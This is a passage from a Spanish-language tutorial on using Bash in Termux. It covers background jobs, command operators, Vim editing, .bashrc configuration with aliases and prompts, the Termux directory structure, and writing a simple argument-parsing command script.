__jobs__ (trabajos en español) mandando a comandos que se están ejecutando a un segundo plano hasta que estos finalicen por si mismos o nosostros los finalicemos de alguna de las múltiples formas que existen. ```bash despedirse() { sleep 5s printf "Adios" sleep 5s printf ", ha sido un placer!" } despedirse & ``` > El comando **sleep** (dormir en español) pausa el programa durante el tiempo que le indiquemos. En este ejemplo son dos intervalos de 5s (segundos) cada uno. Puedes ver los comandos que tengas corriendo en segundo plano (background) con el comando **jobs**, la salida para este ejemplo sería: ```bash [1]+ Running despedirse & ``` El número de la izquierda es un identificador. La primera palabra __running__ (corriendo) nos dice el estado actual del __job__ y a la derecha de todo encontramos el comando que ejecutamos. Puedes traer el proceso al frente (foreground) usando el comando **fg %1**, el número tiene que ser el identificador mostrado en el comando **jobs**. Y como puede forzar el cierre del proceso con las combinaciones de teclas que vimos en apartados anteriores de este mismo capítulo (CTRL C, CTRL D) ##### && El operador **&&** (AND) sirve para ejecutar un comando si el anterior funcionó correctamente. ```bash cat archivoQueExista && echo "El archivo existe y se imprimió correctamente" ``` Muy útil cuando queramos que un comando solo se ejecute si el anterior funcionó ```bash pkg install tree && tree ``` ##### ; El operador **;** es útil para indicar el fin de un comando. Es de uso común cuando quieres correr varios comandos en la misma linea independientemente de si el comando anterior falla o no ```bash cat archivo1.txt; cat archivo2.txt; echo "Adios" ``` #### help El comando **help** nos proporciona ayuda con Bash. ```bash help ``` Si corres el comando, verás un listado de los comandos internos de Bash que disponen de un mensaje de ayuda. Puedes consultar cada uno de ellos escribiendo **help** y el nombre del comando que quieres consultar. ```bash help history ``` #### Extra Puedes reutilizar los comandos de una linea de la terminal navegando por el historial si le das a las flecha hacia arriba y hacia abajo. Si pones # al inicio o final de una linea, estás indicando que la linea a partir del # es un comentario que Bash debe ignorar. Los comentarios son útiles para indicar lo que hace el código. Ejemplo: ```bash # La siguiente linea imprime un texto en pantalla saludando echo "Hola" echo "Adios" # Esta linea imprime Adios en pantalla ``` Bash te permite autompletar comandos, nombre de carpetas y ficheros... Pulsa la tecla tab para ello. Si hay varios resultados no sucederá nada, pero si vuelves a pulsar otra vez tab, los resultados disponibles se mostraran para que puedas tener una vista previa de que comando o archivo quieres autocompletar. Tendrás que escribir caracteres hasta que el texto que tengas escrito solo coincida con uno de los comandos o archivos disponibles. Si por ejemplo tienes un archivo que se llama miFoto_729272927282729172917291919372919172728191928372891.jpg, y quisieses eliminarlo, en lugar de escribir todo el nombre, podrías escribir solo **rm miFo** y pulsar la tecla tab para que el nombre se autocompletase. Si también existe otro archivo que se llama miFortaleza.txt, cuando pulsas tab, Bash no sabe cual de los 2 archivos autocompletar, ya que ambos empiezan por **miFo**. Si vuelves a pulsar tab, ambos saldrán en pantalla para indicarte que debes seguir escribiendo. **rm miFot** sería suciente para que se autocompletase miFoto_.... al pulsar tab. > En Termux la tecla tab se representa por 2 flechas y esta ubicada entre **ESC** y **CTRL** En lugar de utilizar secuencias de caracteres para saltos de linea, puedes usar comillas simples ```bash echo 'Hola Los saltos de linea también se imprimen asì No es genial?' ``` Si utilizas comillas simples, todo lo que escribas dentro será interpretado como texto, entre otras cosas esto te inhabilita de utilizar variables dentro. Ejemplo: ```bash nombre=Manolo echo 'Mi nombre es $nombre' ``` Si utilizas **printf** en lugar de **echo**, si podrás insertar variables de la siguiente forma ```bash nombre=Manolo printf 'Mi nombre es %s' $nombre ``` [Tabla de Contenidos](#tabla-de-contenidos) ----- ## Capítulo 6: Uso de VI y de VIM VI y VIM son editores de texto muy completos. VI es la versión mas pequeña y suele venir por defecto instalado en muchos sistemas. VIM es su hermano mayor e incluye cientos de características. Por si fueran pocas, la comunidad de programadores va creando sus plugins, temas y colores para VIM para extender aún mas su funcionalidad. Dado lo extenso de VI y VIM, pondré el foco en los comandos y atajos que yo mas utilizo, dejando de lado muchísima funcionalidad útil. VIM por si solo daría para un libro entero y no es mi idea reinventar la rueda escribiendo un libro de VIM, asique centrando el tiro. #### Instalar VIM VI suele venir instalado, pero VIM no. Es un paquete mas, asique usaremos el comando que ya conocemos para instalar paquetes en Termux ```bash pkg install vim ``` #### Abrir un fichero Para abrir un archivo que ya existe o crear uno nuevo, usaremos el siguiente comando ```bash vim miListaDeLaCompra.txt ``` Verás que se abre una nueva pantalla desconocida hasta ahora. A lo primero que tenemos que echar ojo es a la barra de estado de VIM. Se encuentra exactamente encima del teclado a la izquierda y si no tocas nada tras abrir el archivo, verás el mensaje: **"miListaDeLaCompra.txt" [new]** en la barra de estado de VIM. Si el archivo ya existía, el mensaje será: **"miListaDeLaCompra.txt" xL xB** donde xL mostrará el número de lineas que tiene el archivo y xB el número de Bytes (un caracter suele pesar al menos 1 Byte, asique es un buen indicador del número aproximado de caracteres que tiene el archivo) que tiene. #### Escribir en un fichero Si pulsas la tecla **i**, verás como el estado cambia a **-- INSERT --**. Esto nos indica que ahora nos encontramos en modo inserción de texto. Si ahora pulsas las teclas, podrás escribir en el archivo al igual que haces en el mítico bloc de notas de Windows. Una vez que tengas tu texto escrito, puedes salir del modo __inserción__ pulsando la tecla ESC. Si te fijas ahora, encima de la barra de estado, que se encontrará vacia tras pulsar ESC, se mostrará el símbolo **[+]** que nos indica que el archivo tiene cambios sin guardar. #### Guardar los cambios Hay varias formas de guardar los cambios. Si queremos guardar los cambios pero continuar usando VIM, usaremos la combinación de teclas **ESC :w**, verás que se muestra **:w** en la barra de estado. Pulsa Enter para introducir la secuencia. El **[+]** desaparecerá, indicando que ya no hay nuevos cambios sin guardar. En la barra de estado verás que se muestra el mismo tipo de mensaje que antes y al final hay una nueva palabra __written__ indicándonos que se han escrito los cambios en el archivo. Si quieres guardar los cambios y cerrar VIM, en lugar de **:w**, debes utilizar **:x** #### Salir de VIM Si no hay cambios pendientes en el archivo, puedes cerrar VIM utilizando **:q**. Recuerda que no debes estar en el modo __insercion__, si estás en ese modo, en su lugar acabarás escribiendo el texto ":q" en el documento. Si tienes cambios en el documento pero quieres salir de todas formas y descartar los cambios que hiciste, debes introducir **:q!**. Solo se descartarán los cambios que no guardases con **:w** #### Cifrar un archivo Es posible cifrar un archivo utilizando **:X**. VIM te pedirá una contraseña y que repitas tu contraseña. Una vez cifrado debes guardar los cambios. Tras guardar los cambios, si no saliste de VIM en la barra de estado se te indicará el algoritmo de cifrado utilizado. En mi caso es **blowfish2**. #### Navegación En VIM puedes tocar sobre el texto del fichero para posicionar el cursor. Tras tener el cursor posicionado, se puede usar el caracter **i** para entrar en modo __insercion__ en el caracter en el que esté el cursor. Si quieres posicionarte para escribir delante de donde tienes el cursor utiliza **a** en lugar de **i** También puedes entrar en modo inserción al principio de la linea usando **I**, al inicio de la linea siguiente (añadiendo un salto de linea en el proceso) utilizando **o**, en la linea anterior (añadiendo un salto de linea en el proceso) utilizando **O**, en el caracter actual (eliminándolo en el proceso) utilizando **x** A parte de moverte tocando el texto e insertar usando teclas, también puedes moverte utilizando distintas teclas. Con **w** te mueves a la siguiente palabra, con **b** te mueves a la palabra anterior, con **e** te mueves al final de la palabra actual, con **$** te mueves al final de la linea actual, con **0** te mueves al inicio de la linea. Si quieres moverte a la linea anterior **k**, a la linea siguiente **j**, al caracter anterior **h**, al caracter siguiente **l**. Si añades un número antes de cualquiera de estas opciones the moverás la cantidad indicada de caracteres/lineas. Si quieres moverte al inicio del archivo **gg**, a la última linea del archivo **G**. Puedes ir a lineas concretas poniendo **:** y el número de la linea concreta a la que quires ir. Por ejemplo si quieres ir a la tercera linea del fichero **:3** y pulsas enter. #### Eliminar contenido También puedes eliminar palabras, lineas, caracteres o partes concretas del archivo. Los comandos son los mismos que los de mover el cursor, pero anteponiendo **d**. Ejemplos: ```bash # Recuerda que estos son comentarios, y su única finalidad es que tu los leas dd # Eliminar la linea en la que está el cursor d$ # Eliminar desde el cursor hasta el final de la linea d0 # Eliminar desde el cursor hasta el inicio de la linea dw # Eliminar desde el cursor hasta el final de la palabra dgg # Eliminar desde el cursor hasta el inicio del archivo dG # Eliminar desde el cursor hasta el final del archivo d16 # Eliminar desde el cursor 16 lineas ``` #### Substituir texto En VIM se pueden substituir todas las palabras de un texto de forma sencilla usando expresiones regulares. Si quieres substituir todas las palabras que digan "hola" por "adios", utilizas el comando ```bash :%s/hola/adios/g # substituye todos los hola por adios :%s/hola/adios/gi # substituye todos los hola por adios aunque tengan mayúsculas ``` > Cuando la palabra/texto tenga caracteres especiales, debes __escaparlos__ usando la barra de escape **\\**. A veces nos equivocamos y queremos deshacer las últimas acciones, para ello puedes usar **u**. También puedes rehacer los cambios que hayas eliminado con **u** utilizando **CTRL r**. Si cierras VIM, se perderá el historial y no podrás deshacer ni rehacer. #### Modo Visual A parte del modo __comando__ que estamos usando y del modo __inserción__, también hay un modo visual al que podemos acceder desde el modo __comando__ pulsando **v**. Una vez estás en el modo visual, podras mover el cursor con las teclas para remarcar un texto. Una vez tienes el texto marcado puedes realizar múltiples acciones sobre él. ```bash y # Copia el texto seleccionado p # Pega el texto x # Corta el texto seleccionado > # Añade identación a las lineas (espacios) < # Quita identación a las lineas (espacios) u # Convierte a minúsculas U # Convierte a mayúsculas ``` > También puedes substituir palabras del texto seleccionado usando expresiones regulares #### Manejo de ventanas y pestañas En VIM también puedes abrir múltiples ventanas con la combinación **CTRL w v**. Cada vez que pulses esta combinación, abrirás una ventana nueva. Si prefieres que la ventana se abra debajo de la actual en lugar de al lado, utiliza **CTRL w s**. Puedes combinarlas y tener ambos tipos de ventanas abiertas a la vez. Puedes modificar el ancho de la ventana usando **CTRL w >** para aumentar su ancho o **CTRL w <** para reducirlo. Puedes modificar la altura de la ventana usando **CTRL w +** para aumentarla o **CTRL w -** para reducirla. Si vas a cerrar el archivo actual, para abrir otro distinto, en su lugar puedes hacer directamente **:open nombreDelArchivo.txt**, sirve tanto para nuevos archivos, como para archivos que ya existen. Otra opción para abrir un nuevo archivo, esta vez, sin cerrar el actual es **:e nombreDelArchivo.txt**. Puedes cambiar entre archivos utilizando **:bn** y **:bN** La opción **:tabnew ejemplo.txt** sirve para abrir el archivo indicado en una nueva pestaña. Puedes moverte entre las pestañas abiertas utilizando **:b#** #### Realizar búsquedas Puedes buscar palabras si pones una **/**. Ejemplo: ```bash /hola ``` Una vez tengas tu palabra resaltada, puedes fijarla usando enter. Al estar la búsqueda fija, podras moverte a la siguiente palabra que cumpla tu búsqueda utilizando el caracter **n** o a la anterior utilizando **N** [Tabla de Contenidos](#tabla-de-contenidos) ----- ## Capitulo 7: Configuración de Bash Bash tiene múltiples opciones de configuración y hay varias formas de configurarlo dependiendo del sistema. En Termux lo configuraremos utilizando el archivo .bashrc. Este archivo debemos crearlo en la carpeta Home. Usaremos vim para ello. ```bash vim ~/.bashrc ``` Todos los comandos que escribamos en este archivo se ejecutarán cada vez que iniciemos Termux, o cuando iniciemos una nueva pestaña de Termux. > Al final del capítulo veremos como activar todo lo que tengamos en el archivo sin necesidad de abrir una nueva terminal, para poder visualizar los cambios directamente en la terminal actual. Lo primero será añadir el siguiente texto en el archivo: ```bash # Si Bash no es interactivo, detiene la lectura de este archivo case $- in *i*) ;; *) return ;; esac ``` Este pequeño script/código sirve para que no se configuren las terminales de Bash que no sean interactivas. Esto sirve para evitar que se configure Bash cuando lo utilizemos para correr un comando. Por ejemplo **bash miArchivo.sh**. En el [capítulo 9: Creando comandos](#cap%C3%ADtulo-9-creando-comandos) lo entenderás mejor. ##### EDITOR La variable "$EDITOR" sirve para configurar un editor de texto como editor por defecto de Bash. ```bash export EDITOR='vim' ``` Al exportar la variable __"$EDITOR"__ indicando que se use **vim**, podremos editar los comandos que estamos escribiendo en la terminal usando la combinación de teclas **CTRL X CTRL E**. ##### histappend El argumento __histappend__ sirve para que el historial se comparta entre pestañas, ventanas y sesiones. Nos servirá para asegurarnos que si abrimos una nueva terminal, tengamos accesible el historial, permitiéndonos reutilizar los comandos sin tener que escribirlos de 0. Si lo quieres activar añádelo a una nueva linea: ```bash shopt -s histappend ``` ##### checkwinsize El argumento __checkwinsize__ hará comprobaciones automáticas tras dar o quitar zoom en Termux para ajustar las filas y columnas de las tablas que tengamos impresas en pantalla. ```bash shopt -s checkwinsize ``` ##### autocd El argumento __autocd__ nos permite omitir cd para entrar en carpetas. Es útil para todas aquellas carpetas que no compartan nombre con comandos instalados. ```bash shopt -s autocd ``` Con este opción, si tienes una carpeta que se llama fotos, en lugar de escribir **cd fotos** para entrar en ella, podrás escribir directamente **fotos**. Si por ejemplo nombrases a tu carpeta **ls**, entonces no funcionaría porque estarías corriendo el comando **ls** en lugar de ingresar a la carpeta ls. ##### cdable_vars El argumento __cdable_vars__ te permitirá utilizar cd con variables si el nombre de la variable no coincide con el de una carpeta a la que puedes hacer cd. ```bash shopt -s cdable_vars ``` Cuando activemos el archivo __.bashrc__, podremos hacer lo siguiente para ir a la carpeta __ejemplo__ (si esta existe en HOME) desde cualquier lugar. ```bash EJEMPLO=/data/data/com.termux/files/home/ejemplo cd EJEMPLO ``` Si existiese una carpeta llamada __EJEMPLO__, **cd** entraría dentro de esta, si no existe es entonces cuando se comprobaría si **$EJEMPLO** existe y se haría **cd** a la ruta que tenga esta variable. ##### cdspell El argumento __cdspell__ te permitirá utiliza cd sobre archivos cuando cometas pequeños errores ortograficos. Si tienes una carpeta que se llama __ejemplo__ y escribes por error **cd ejemplos** Bash te corregirá el error automáticamente. ```bash shopt -s cdspell ``` ##### globstar El argumento __globstar__ te permitirá utilizar **\*\*** para referenciar todos los archivos en el directorio y subdirectorios referenciados ```bash shopt -s globstar ``` Con un ejemplo se entiende mejor. Digamos que tenemos la siguiente estructura de archivos: ```bash test/ ├── adios.txt ├── carpeta │   └── numeros.txt └── hola.txt ``` Si utilizamos el comando **cat test/\*\*** sin tener __globstar__ activado, se imprimirá: ```bash adios cat: test/carpeta: Is a directory hola ``` Si hemos activado __globstar__, el resultado será: ```bash cat: test/: Is a directory adios cat: test/carpeta: Is a directory 1 2 3 hola ``` ##### addPath La función **addPath** nos será útil en el capìtulo 9, añádela también a este archivo. Sirve para indicarle a Bash en que carpetas tenemos comandos. ```bash addPath() { if [ -d "$1" ] && [[ ":$PATH:" != *":$1:"* ]]; then PATH="${PATH:+"$PATH:"}$1"; fi } ``` ##### extract La función **extract** comprueba la extensión de un archivo comprimido y lo descomprime como corresponda según la extensión detectada ```bash extract() { for archive in $*; do if [ -f $archive ]; then case $archive in *.tar.bz2) tar xvjf $archive ;; *.tar.gz) tar xvzf $archive ;; *.bz2) bunzip2 $archive ;; *.rar) rar x $archive ;; *.gz) gunzip $archive ;; *.tar) tar xvf $archive ;; *.tbz2) tar xvjf $archive ;; *.tgz) tar xvzf $archive ;; *.zip) unzip $archive ;; *.Z) uncompress $archive ;; *.7z) b7z x $archive ;; *) echo "don't know how to extract $archive..." ;; esac else echo "$archive is not a valid file!" fi done } ``` ##### alias En este archivo también podrás crear alias, que sirven para poder llamar a otros comando o carpetas utilizando nombres personalizados. Aquí un ejemplo con alias que sirven para añadir colores a algunos comandos. ```bash alias ls='ls --color=auto' alias dir='dir --color=auto' alias vdir='vdir --color=auto' alias grep='grep --color=auto' alias fgrep='fgrep --color=auto' alias egrep='egrep --color=auto' ``` Ahora cuando escribas el comando **ls**, Bash le añadirá el argumento __--color=auto__ de forma transparente. Mas alias útiles que suelo utilizar: ```bash alias l='ls' # Utiliza l en lugar de ls alias la='ls -a' # Utiliza la para listar ficheros ocultos alias v='vim' # Utiliza v en lugar de vim alias c='clear' # Utiliza c en lugar de clear alias cl='clear && ls' # Utiliza cl para limpisr la pantalla y listar alias ..='cd ..' # Muevete a la carpeta 1 nivel superior alias ...='cd ../..' # Muevete a la carpeta 2 niveles superior alias ....='cd ../../..' # Muevete a la carpeta 3 niveles superior alias .....='cd ../../../..' # Muevete a la carpeta 4 niveles superiores alias pserv='python -m http.server' # Sirve la carpeta actual alias gitc='"'"'git clone'"'"' # Clona un repositorio alias 775='"'"'chmod +775'"'"' # Da permisos de ejecución alias folder='du -h --max-depth=1' # Muestra el tamaño de ficheros alias h='history' # Muestra el historial alias myip='curl http://ifconfig.me/ip' # Muestra tu ip pública alias quit='exit' # Cierra la terminal alias q='exit' # Cierra la terminal alias sb='source ~/.bashrc' # Actualiza los cambios en el archivo de Bash ``` ##### colores Exportar variables que guarden colores nos será muy útil. Por ejemplo para usarlos con echo u otros comandos. ```bash export red=$'\e[1;31m' # rojo export green=$'\e[1;32m' # verde export yellow=$'\e[1;33m' # amarillo export blue=$'\e[1;34m' # azul export cyan=$'\e[1;35m' # cian export white=$'\e[1;37m' # blanco export endc=$'\e[0m' # finaliza el color (color normal) export lightgray=$'\e[0;37m' # gris claro export black=$'\e[0;30m' # negro export darkgray=$'\e[1;30m' # gris oscuro export darkred=$'\e[0;31m' # rojo oscuro export darkgreen=$'\e[0;32m' # verde oscuro export darkyellow=$'\e[0;33m' # amarillo oscuro export darkblue=$'\e[0;34m' # azul oscuro export magenta=$'\e[0;35m' # magenta export darkcyan=$'\e[0;36m' # cian oscuro export underlinedarkgray=$'\e[0;30m' # subrayado gris oscuro ``` Ahora podemos usar los colores, por ejemplo para resaltar palabras de los manuales: ```bash export LESS_TERMCAP_mb=${green}; export LESS_TERMCAP_md=${green}; ``` > Estos colores se aplicarán a las páginas mostradas por el comando **man** ##### prompts La prompt de la terminal en Termux solo muestra un dolar. Podemos usar distintos comandos para configurarla. Ya sea por utilidad o por estética. Aquí tienes el código de mi prompt: ```bash PS1='\n\n${underlinedarkgray}${darkgray}(${blue}$(date +%H${darkgray}:${blue}%M${darkgray}:${blue}%S${darkgray}:${blue}%4N)${darkgray}) ${green}$(pwd)${endc}\n> ' PS2='${blue}.${endc} ' ``` ![Prompt de Bash, ps1](https://github.com/StringManolo/hackingTermux101/raw/master/imagenes/ps1.jpg) Como ves, esta prompt pinta la fecha, la hora, minutos, segundos... y el directorio actual de trabajo. Así sabes siempre en que carpeta te encuentras sin necesidad de recurrir al comando **pwd** directamente. Para que se apliquen inmediatamente todos los cambios usaremos el comando **source** ```bash source ~/.bashrc ``` [Tabla de Contenidos](#tabla-de-contenidos) ----- ## Capítulo 8: Sistema de Ficheros En Termux así como en GNU/Linux, disponemos de un sistema base que incluye múltiples archivos y carpetas. Vamos a conocer mejor la estuctura del sistema de ficheros de Termux. (Puede variar un poco entre versiones) ###### com.termux/ Carpeta privada de la app Termux ###### com.termux/files/ Archivos de la aplicación ###### com.termux/files/home/ Carpeta principal del usuario ###### com.termux/files/home/.termux/ Archivos de configuración de la app como atajos de teclado de Termux ###### com.termux/files/home/.termux/termux.properties Archivo con la configuración de la app de Termux. Atajos y ajustes de teclado, modo pantalla completa, etc. Corre el comando termux-reload-settings para aplicar los cambios sin necesidad de reiniciar la app. ###### com.termux/files/home/storage/ Se activa con el comando termux-setup-storage y te permite acceder a los archivos internos del dispositivo. ###### com.termux/files/home/storage/dcim/ La usa la cámara para guardas las fotografías de la cámara ###### com.termux/files/home/storage/downloads/ Carpeta por defecto de Android para descargas ###### com.termux/files/home/storage/movies/ Carpeta para almacenar los videos del dispositivo ###### com.termux/files/home/storage/music/ La música se puede almacenar aquì ###### com.termux/files/home/storage/pictures/ Las imágenes del dispositivo se pueden guardar aquí ###### com.termux/files/home/storage/shared/ Carpeta compartida de propósito general para todas las apps ###### com.termux/files/usr/ Imita la carpeta / de GNU/Linux ###### com.termux/files/usr/bin/ Carpeta principal para ejecutables/comandos de Termux ###### com.termux/files/usr/etc/ Archivos de configuración diversos relacionados con el sistema o programas ###### com.termux/files/usr/etc/alternatives Selecciona los ejecutables por defecto para trabajar con ciertos tipos de archivos. Por ejemplo el enlace directo al editor de texto de Termux por defecto. ###### com.termux/files/usr/etc/apt/ Archivos del gestor de paquetes APT ###### com.termux/files/usr/etc/apt/apt.conf.d Archivos de configuración de APT ###### com.termux/files/usr/etc/apt/preferences.d Archivos para configurar las preferencias de APT, por ejemplo si quieres priorizar que se descarge la versión mas reciente de los paquetes por defecto, priorizar que se descargen los paquetes estables, .... ###### com.termux/files/usr/etc/apt/sources.list Este es un archivo de configuración de APT (el sistema de gestión de paquetes de Debian) que indica a APT dónde buscar paquetes para instalar. En este caso, se refiere a los repositorios que se pueden usar en Termux. ###### com.termux/files/usr/etc/apt/trusted.gpg Archivo de claves públicas utilizados por APT para verificar la autenticidad de los paquetes descargados de los repositorios. trusted.gpg contiene las claves de confianza que se aplican a todos los repositorios. ###### com.termux/files/usr/etc/apt/trusted.gpg.d Trusted.gpg.d es un directorio que contiene archivos adicionales de claves de confianza para repositorios específicos. ###### com.termux/files/usr/etc/bash.bashrc Este es un archivo de configuración de shell de Bash, que se ejecuta cada vez que se inicia una sesión de Bash en Termux. Aquí se pueden agregar alias, variables de entorno y otras configuraciones personalizadas para Bash. ###### com.termux/files/usr/etc/bindresvport.blacklist Se utiliza para especificar los puertos que deben evitarse al enlazar un socket en el sistema. Los puertos incluidos en este archivo son los que están reservados por el sistema operativo y no deben ser utilizados por aplicaciones normales, ya que pueden causar conflictos con otros servicios del sistema. El archivo puede ser editado para agregar o quitar puertos de la lista negra según sea necesario. ###### com.termux/files/usr/etc/inputrc Este es un archivo de configuración de readline, que controla el comportamiento de la entrada de texto en la línea de comandos. Aquí se pueden configurar atajos de teclado y otras opciones relacionadas con la entrada de texto. ###### com.termux/files/usr/etc/motd Archivo de mensaje de bienvenida que se muestra al iniciar sesión en la terminal. ###### com.termux/files/usr/etc/motd-playstore Archivo de mensaje de bienvenida que se muestra solo cuando se instala Termux desde Google Play Store. ###### com.termux/files/usr/etc/nanorc Archivo de configuración utilizado por el editor de texto "Nano" que contiene configuraciones para personalizar la interfaz de usuario y las funciones del editor de texto Nano, como el color del texto, los atajos de teclado, el número de espacios por tabulación y mucho más. ###### com.termux/files/usr/etc/netconfig Este archivo es utilizado por los programas que necesitan acceder a la red, como los navegadores web o los clientes de correo electrónico, para determinar cómo conectarse a Internet y cómo acceder a los servicios de red. El archivo netconfig también puede contener información sobre la configuración de proxy y otras opciones de red. ###### com.termux/files/usr/etc/profile Archivo de configuración de shell que se ejecuta cada vez que se inicia una sesión de shell en Termux. profile es el archivo de configuración principal. ###### com.termux/files/usr/etc/profile.d Directorio que contiene archivos de configuración adicionales que se ejecutan después de profile. ###### com.termux/files/usr/etc/profile.d/gawk.csh Este archivo es parte del paquete "gawk" y contiene configuraciones de variables de entorno específicas de la aplicación gawk. Es ejecutado automáticamente cuando se inicia el shell de Termux y se carga la aplicación gawk. La función de este archivo es establecer variables de entorno para la aplicación, lo que permite que el software funcione correctamente. ###### com.termux/files/usr/etc/profile.d/gawk.sh Este archivo agrega algunas configuraciones específicas para el programa gawk en la variable de entorno PATH, que es la ruta de búsqueda para los ejecutables. En concreto, agrega el directorio /data/data/com.termux/files/usr/bin al principio de la ruta de búsqueda y luego exporta la variable AWK para que apunte al programa gawk. Esto permite que gawk se ejecute directamente desde la línea de comandos sin tener que proporcionar la ruta completa al ejecutable. ###### com.termux/files/usr/etc/profile.d/init-termux-properties.sh Script de shell que se ejecuta automáticamente cada vez que se inicia una sesión de terminal en Termux. Este script se utiliza para establecer algunas propiedades de Termux, como el color de la terminal, el comportamiento del teclado, el directorio de trabajo predeterminado, etc. ###### com.termux/files/usr/etc/termux-login.sh Script de inicio de sesión que se ejecuta al iniciar sesión en la aplicación Termux en un dispositivo Android. Este archivo permite personalizar el inicio de sesión de Termux y configurar variables de entorno adicionales, aliases y otras opciones personalizadas. Por ejemplo, se puede agregar un mensaje personalizado o mostrar información sobre la versión de Termux instalada en el dispositivo. ###### com.termux/files/usr/etc/tls Este es un directorio que contiene archivos de configuración relacionados con TLS (Transport Layer Security), que se utiliza para cifrar las comunicaciones de red. ###### com.termux/files/usr/etc/tls/cert.pem Archivo de certificado de seguridad que se utiliza para autenticar la identidad de otros sistemas en la red. ###### com.termux/files/usr/etc/tls/openssl.cnf Archivo de configuración para OpenSSL, que es una biblioteca de cifrado utilizada por muchos programas de línea de comandos. ###### com.termux/files/usr/etc/unbound Directorio que contiene archivos de configuración para el servidor DNS Unbound, que se utiliza para resolver nombres de dominio en direcciones IP. ###### com.termux/files/usr/etc/unbound/unbound.conf Archivo de configuración principal de Unbound. ###### com.termux/files/usr/include Generalmente contiene los archivos de cabecera (header files) de bibliotecas C que se utilizan para compilar aplicaciones en Termux. Estos archivos proporcionan las declaraciones de funciones y estructuras necesarias para que las aplicaciones se comuniquen con las bibliotecas. Las bibliotecas C son componentes esenciales del sistema operativo y proporcionan una variedad de funcionalidades, desde la gestión de archivos hasta el procesamiento de imágenes. ###### com.termux/files/usr/lib Carpeta donde se almacenan las bibliotecas compartidas de programas instalados en Termux. Las bibliotecas compartidas son fragmentos de código que pueden ser utilizados por diferentes programas, en lugar de tener que escribir el mismo código repetidamente en cada programa. ###### com.termux/files/usr/libexec Contiene archivos ejecutables que son utilizados por otros programas del sistema. En general, los archivos que se encuentran en esta carpeta no son ejecutables de forma independiente, sino que son llamados por otros programas cuando se necesitan realizar ciertas tareas específicas. ###### com.termux/files/usr/opt Directorio de instalación opcional para aplicaciones adicionales que no son necesarias para el funcionamiento básico de Termux. Esta carpeta se usa para instalar paquetes y software adicionales que no se encuentran en los repositorios predeterminados de Termux. Los programas instalados en esta carpeta a menudo necesitan configuración adicional para funcionar correctamente en Termux. ###### com.termux/files/usr/share Contiene una variedad de recursos compartidos que pueden ser utilizados por diferentes programas en el sistema. ###### com.termux/files/usr/tmp Directorio donde se almacenan archivos temporales creados por diferentes programas y procesos en ejecución en el sistema. ###### com.termux/files/usr/var Puede contener registros de actividades del sistema, archivos temporales, archivos de caché, bases de datos de aplicaciones, entre otros. [Tabla de Contenidos](#tabla-de-contenidos) ----- ## Capítulo 9: Creando comandos Los comandos de Bash pueden ser alias y funciones como ya vimos en el [capitulo 7: Configuración de Bash](#capitulo-7-configuraci%C3%B3n-de-bash). La forma mas común de crear comandos es creando un archivo con código Bash y añadir en la primera linea un shebang. Vamos a crear un archivo que solo diga "Hola". Ponle de nombre saludar con el comando **vim saludar**. ```bash #!/usr/bin/env bash echo "Hola" ``` Para poder ejecutar el archivo debes darle permisos: ```bash chmod 775 saludar ``` Si corres el comando **ls**, verás que saludar sale de color verde. Esto significa que tiene permisos de ejecución. Para correr ejecutables usaremos el comando **./saludar** Para poder utilizar el comando desde cualquier lugar del sistema debes mover el fichero s alguna de las carpetas listadas en la variable **"$PATH"**. Puedes imprimirla para ver el listado de carpetas. En este ejemplo, movemos el archivo a /bin, en Termux puedes correr el siguiente comando: ```bash mv saludar ~/../usr/bin ``` Ahora puedes ejecutar el comando saludar desde cualquier lugar y omitiendo el **./** ```bash saludar ``` La gran mayoría de veces que creemos comandos, querremos aceptar argumentos. Vamos a añadir funcionalidad a nuestro comando saludar. Puedes remplazar el contenido de saludar con el comando **vim ~/../usr/bin/saludar**, por el siguiente: ```bash #!/usr/bin/env bash argumentos="help,name:" argumentosSimples="hn:" procesados=$(getopt --options=$argumentosSimples --longoptions=$argumentos --name "$0" -- "$@") ayuda() { echo -e "This commands says hi in spanish\nExample: saludar --name Manolo\n"; exit } while true; do case "$1" in -h | --help) ayuda; shift ;; -n | --name) name="$2" shift 2 ;; --) shift break ;; *) echo "Error" exit 3 ;; esac done if [ -n "$name" ]; then echo "Hola $name" else echo "Hola" fi ``` Esta sería la forma mas completa para poder procesar argumentos en Bash. Si corres el comando **saludar**, verás que te dice __Hola__. Ahora también acepta varios argumentos. Por ejemplo el argumento name (nombre en español). **saludar --name Manolo** y también el argumento **--help**. Ambos argumentos admiten su versión cortas **-n**, **-h** respectivamente. Explicación del código: ```bash #!/usr/bin/env bash ``` El shebang sirve para indicar a la consola que tipo de programa es. En este caso un binario de Bash. Si utilizases código Python o cualquier otro lenguaje, podrías remplazar **bash** por python o el ejecutable que correspondiese. En este caso usamos lenguaje **Bash**, asique indicamos __bash__ en el shebang. ```bash argumentos="help,name:" ``` En la variable **$argumentos** almacenamos una lista de argumentos léxicos separados por comas. Si quieres que uno de los argumentos acepte texto del usuario debes añadirle **:**. Por ejemplo **argumentos="nombre:,edad:,ayuda,domicilio:** acepta texto para los argumentos nombre, edad y domicilio. ```bash argumentosSimples="hn:" ``` En la variable **$argumentosSimples** almacenamos una lista (sin comas) de argumentos simples. Por ejemplo **n:e:ad:** serían los argumentos cortos para nombre, edad, ayuda y domicilio. ```bash procesados=$(getopt --options=$argumentosSimples --longoptions=$argumentos --name "$0" -- "$@") ``` En la variable procesados almacenamos el resultado de ejecutar el comando **getopt**. Este comando sirve para procesar argumentos en Bash. A **getopt** le pasamos los argumentos que hemos guardado previamente para que los procese. El argumento --name de **getopt** sirve para indicarle a **getopt** el nombre de nuestro comando. En este caso utilizamos la variable **"$0"**. > La variable **$0** almacena el primer argumento de la terminal (separado por espacios). Si por ejemplo corremos el comando **saludar --nombre manolo** tendríamos "saludar" en **$0**, --nombre en **$1** y manolo en **$2**. En los comandos/scripts/archivos de Bash, asi como en funciones, también disponemos de la variable **$#** que contiene el número de argumentos del comando. > En el caso de **saludar --nombre manolo** la variable "$#" imprime 2. (El nombre del comando no se cuenta, ya que **$#** solo imprime el número de argumentos. Si usases el comando **bash ./saludar --nombre manolo** también se omitiría el comando **bash**. > La variable "$@" contiene todos los argumentos. Al igual que en **$#** se omite el nombre del comando. Dentro del **switch case** verás 3 comandos nuevos. **shift**, **break** y **exit**: ##### shift El comando **shift** permite "avanzar" el nùmero indicado de argumentos. Si por ejemplo tenemos el comando **saludar hola que tal estas**, detectamos el argumento __hola__ en un case y ejecutamos shift, se avanza hacia el argumento __que__. Si ponemos **shift 2**, avanzamos hasta el argumento __tal__, y asì sucesivamente. Esto nos permite ignorar elementos en un bucle. ##### break El comando **break** nos permite finalizar un bucle sin dejarlo terminar de ejecutarse como haría normalmente, asì podremos avanzar en el programa 